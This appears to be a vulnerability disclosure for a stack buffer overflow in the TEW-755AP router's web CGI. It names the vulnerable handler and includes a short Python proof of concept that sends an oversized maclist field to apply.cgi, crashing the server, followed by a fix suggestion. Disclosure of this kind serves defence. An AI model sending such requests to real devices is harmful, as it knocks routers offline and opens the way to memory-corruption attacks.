We found a stack buffer overflow vulnerability at **TEW-755AP (**Firmware version TEW755AP-FW113B01.bin).
In the handler function for action kick_ban_wifi_mac_allow (sub_415B00) of the file /www/cgi/ssi, the value of qcawifi.wifi%d_vap%d.maclist is directly copied to stack buffer via strcpy at line 25 without size check. An attacker can overflow the stack buffer by specifying qcawifi.wifi%d_vap%d.maclist as a very long string.
PoC
import requests
url = "<http://192.168.17.221:80/apply.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'action' : "kick_ban_wifi_mac_allow",
"qcawifi.wifi1_vap12.maclist" : "a"*0x1000}
response = requests.post(url, cookies=cookie, data=data)
print(response.text)
print(response)
We use python to send a crafted HTTP post request to the web server, and print out the return message.
Send the crafted HTTP request to the server, it will return 502 error code.
Fix Suggestion:
Use strncpy to perform avoid buffer overflow